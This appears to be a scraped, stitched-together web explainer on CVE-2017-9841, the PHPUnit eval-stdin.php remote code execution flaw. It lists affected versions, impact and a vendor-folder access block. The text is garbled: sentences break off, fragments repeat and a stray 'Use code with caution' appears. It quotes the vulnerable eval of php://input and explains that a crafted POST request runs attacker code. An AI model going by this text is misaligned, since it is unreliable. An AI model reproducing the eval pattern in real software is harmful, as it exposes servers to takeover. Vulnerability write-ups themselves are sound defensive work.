The core issue behind CVE-2017-9841 is not a complex cryptographic failure or a subtle logical flaw. Instead, it is a textbook case of .
If the file is accessible at:
else // Handle or log invalid input
Prevent direct access to any script inside vendor/ : vendor phpunit phpunit src util php eval-stdin.php cve
Short term (hours–days)
: Full system compromise, including the ability to steal sensitive credentials (like .env files), install malware, or access databases.
Long term (weeks–months)
The file eval-stdin.php was designed as a helper for PHPUnit's internal test runner to receive and execute PHP code from standard input. In vulnerable versions, its code was dangerously simple, directly evaluating user-supplied input via PHP's eval() function. For example, a simplified vulnerable code looks like this:
Successful exploitation allows attackers to perform highly damaging actions, such as:
Full server compromise, data theft, and malware installation, such as the Androxgh0st malware often seen targeting this exploit in 2024 and 2025. Affected Versions PHPUnit 4.x: Versions before 4.8.28. PHPUnit 5.x: Versions before 5.6.3. PHPUnit.Eval-stdin.PHP.Remote.Code.Execution The core issue behind CVE-2017-9841 is not a
This line reads the raw body of an HTTP request (via php://input ) and executes it using the eval() function. If the /vendor folder is publicly accessible from the web, anyone can send a crafted POST request to execute arbitrary code on your server. PHPUnit 4.x: Prior to version 4.8.28 PHPUnit 5.x: Prior to version 5.6.3 Exploitation Example CVE-2017-9841 Detail - NVD
The vulnerability allows an attacker to execute arbitrary code on the server by crafting a malicious payload and sending it to the eval-stdin.php script. This can lead to a complete compromise of the server, including data theft, unauthorized access, and even a full system takeover.
The vulnerability is contained entirely within a single line of execution inside that script: eval('?>' . file_get_contents('php://input')); Use code with caution. How the Exploit Works Long term (weeks–months) The file eval-stdin
:
The function php://input reads raw data from the body of an HTTP request. When paired with eval() , any data forwarded via an HTTP POST request is compiled directly as executable PHP script on the underlying web server.